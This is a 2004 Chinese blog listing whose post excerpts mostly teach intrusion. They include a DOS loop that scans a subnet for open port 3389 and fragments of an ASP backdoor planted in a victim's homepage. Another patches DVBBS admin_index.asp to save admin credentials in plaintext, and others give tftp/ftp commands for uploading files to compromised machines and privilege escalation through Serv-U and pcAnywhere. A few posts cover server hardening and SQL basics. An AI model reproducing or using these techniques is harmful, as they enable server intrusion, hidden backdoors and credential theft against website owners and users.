- 博客(19)
- 收藏
- 关注
RSS订阅原创 用DOS命令扫描一个网段的全部端口,不需要任何工具
在win2000下开一个dos窗口,然后执行 for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 这条命令执行后 会在任务栏开254个小窗口 然后telnet链接失败的窗口会在大约5秒后自动退出 剩下的窗口就是相对应开放端口的主机了 看一下小窗口的
2004-10-20 19:27:00
2218
1
原创 渗透国内某网络游戏服务器群记实
没什么技术性,只是想说明现状 现在想弄钱的入侵者,似乎热衷于入侵网络游戏服务器,盗出游戏服务器程序或是数据库。国内的网络游戏企业,都应该招受过此损失,有暴露出来的,有没暴露出来的。但游戏企业对安全问题理解都十分片面,狭隘! 当然,不只是网络游戏企业。近一两年来,入侵者乐此不疲,各种商业数据的偷盗在国内几乎快形成一种"圈内产业"。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似
2004-10-20 10:30:00
8724
26
原创 精解——安全配置 Windows 2000服务器
目前,WIN2000 SERVER是比较流行的服务器操作系统之一,但是要想安全的配置微软的这个操作系统,却不是一件容易的事。本文试图对win2000 SERVER的安全配置进行初步的探讨。 一、定制自己的WIN2000 SERVER: 1.版本的选择:Win2000有各种语言的版本,对于我们来说,可以选择英文版或简体中文版,我强烈建议:在语言不成为障碍的情况下,请一定使用英文版
2004-10-20 10:03:00
1383
1
原创 MY SQL 常用命令
有很多朋友虽然安装好了mysql但却不知如何使用它。在这篇文章中我们就从连接MYSQL、修改密码、增加用户等方面来学习一些MYSQL的常用命令。 一、连接MYSQL。 格式: mysql -h主机地址 -u用户名 -p用户密码 1、例1:连接到本机上的MYSQL。 首先在打开DOS窗口,然后进入目录 mysqlbin,再键入命令mysql -uroot -p,回车后提示你输密码,如
2004-10-20 10:02:00
1185
原创 SQL高手篇:精妙SQL语句介绍
说明:复制表(只复制结构,源表名:a 新表名:b) SQL: select * into b from a where 1 说明:拷贝表(拷贝数据,源表名:a 目标表名:b) SQL: insert into b(a, b, c) select d,e,f from b; 说明:显示文章、提交人和最后回复时间 SQL: select a.title,a.
2004-10-19 01:08:00
1064
原创 插入式免杀后门--将后门放到对方主页里
昨天也不知怎就搞到中国域名网的权限了,搞了很久,有自动备份。转入正题:1.随便找他一个页面,然后把如下内容分开插入到它的主页了,注意一下上下文。内容(fso):"" then %>save Success!" %>Save UnSuccess!" %>最好要分开插入!!这样管理员也不容易发现。2.将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路
2004-10-19 01:06:00
1407
1
原创 ASP木马配合Serv-U提升权限图文教程
第一步得到一个webshell,找到一个everone权限目录,把提升权限工具传上去,执行命令 第二步,连上去吧 第三步,当然有的机器有pcanywhere了,像这台 下载下来破解 第四步连上去看看,还是win2003 第五步开3389吧 第六步加个用户。 其实在pcanywhere里边也行 工具下载 http://pic.yt-e.com/
2004-10-19 01:00:00
2555
原创 突破动力文章上传asp的限制
在入侵动力文章系统,成功进入后台后,也许你会发现,它的后台没有上传ASP的功能,因为动力文章系统的文件过滤是直接写在代码里的。我介绍一种突破这种限制的方法。虽然它禁止了上传ASP,但是我们可以直接写代码啊! 推荐版权信息输入框,框框大比较好写一点^_^。注意,动力文章系统是将这里写入的代码以字符串的形式写道Config.asp里的,所以我们直接复制ASP木马的代码是行不通的。
2004-10-19 00:55:00
1904
原创 惊爆:江民公司官方网站今日被黑
今日晚6点左右,笔者访问江民杀毒软件公司官方网站查看最新病毒情况时意外发现,江民公司官方网站主页被黑客篡改为“NND,你们去论坛看看,一片怨声载道,你们干什么去了?! By河马史诗”(如图)。 笔者随后登陆江民公司官方论坛,发现论坛可以正常登陆。 几十分钟后,当笔者在18:57分再次访问江民公司官方网站后,首页已无法显示(如图)。 一同被黑的还有另一家网
2004-10-18 20:11:00
3010
原创 上传方法总结[对入侵很实用]
作者:小虾米 来自:朋友的家现在将本人用于上传的方法进行汇总如下:1. tftp法先在自己某机器上建个tftp服务器,如执行tftpd32.exe,再将文件(sample.exe)上传到别的机器中(肉鸡),肉鸡cmd中执行: tftp -i 服务器ip get sample.exe2. ftp法肉鸡cmd中执行:echo open ftp服务器ip [端口]>ftp.txtecho
2004-10-18 19:57:00
1494
原创 SYMANTEC防火墙内核溢出漏洞利用之安全返回法
作者:SoBeIt 来自:https://www.xfocus.net这个漏洞发生在SYMDNS.SYS中,当处理DNS答复时,由于未检验总域名长度,导致可以输入一超长域名导致溢出,溢出发生在RING0、IRQL = 2(DISPATCH_LEVEL)、 进程PID为0(idle进程)的环境下。 一个DNS报文格式如下: "/xEB/x0B" //报文ID,可以随意设
2004-10-18 19:56:00
943
原创 直接获取Access、SQL Server等数据库数据
直接获取access、SQL Server等数据库数据Author: MixPST,Ph4nt0m Security Teamhttp://www.ph4nt0m.org当使用SQL注入access的时候,经常会遇到密码为中文、猜不到关键字段名这样的问题。使用本技术就能够很快速的解决这样的问题。本技术最低要求有两条:1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持
2004-10-18 19:55:00
1425
原创 欢迎CrackJava、deloo、GHOSTKILLER加入XU安全组!
热烈欢迎CrackJava、deloo、和GHOSTKILLER加入XU安全组!XUST力量持续壮大中……不断努力,不断收获!
2004-10-17 22:34:00
1056
6
原创 XU安全组核心人员招收条件
首先你要知道我们是一个以黑客技术、信息与网络安全技术为主的网站,我们的目标是维护网络安全。1、熟悉TCP/IP协议,并且可以熟练使用Windows或者*NIX中任何一种操作系统,并且了解其攻击方法。2、熟练掌握安全维护中常用的工具,并且了解它的工作原理。多数操作可以自己手动完成。3、熟练汇编与反汇编、C/C++、VC++、PERL、JAVA等编程语言中的至少一种。4、熟练多种数据库
2004-10-16 12:59:00
1017
2
原创 MySQL安全问题(匿名用户)的一点心得
前两天在帮朋友整理他的主页空间时候,发现的一点关于MySQL可能大家都会忽略的问题: 我们知道,在安装完MySQL后,它会自动创建一个root用户和一个匿名用户,其初始密码都是空,对于前者,很多参考资料上都会提醒大家要注意及时设定一个密码,而忽略了后者,大概是因为后者默认设定为只能在本机使用的缘故吧。 但如果你的MySQL是要提供给web服务器作数据库服务的,忽略这个匿名用户的代价可能相当惨重,因
2004-10-15 17:34:00
1077
1
原创 修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("ok.
2004-10-15 17:18:00
6363
原创 对一个安全设置比较BT的虚拟主机的安全测试
作者:血汉 文章来源:www.qfaq.com前几天无聊时看到一个木马站,然后就对他进行了一番安全测试,发现是在一个虚拟主机上的,而虚拟主机的安全设置又比较高,我今天就把我是怎么进入这个木马站的经过写出来,里面没有设计到什么技术性的东西,只是把这次的思路说下,因为经验才是最重要的! 首先看了下站.发现是动力的系统,看了下版本MyPower Ver3.51,当时还比较新,注入过滤的比较好,上传
2004-10-15 17:09:00
1441
原创 XUST组于2004年10月14日成立!
XUST创始成员: ·ABEND@XUST 色既是空 ·Lindows@XUST 疯狂自恋 ·Perl@XUST 有点儿坏 ·PHP+MYSQL@XUST 继续做梦人员按照字母排列!
2004-10-14 19:19:00
1118
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人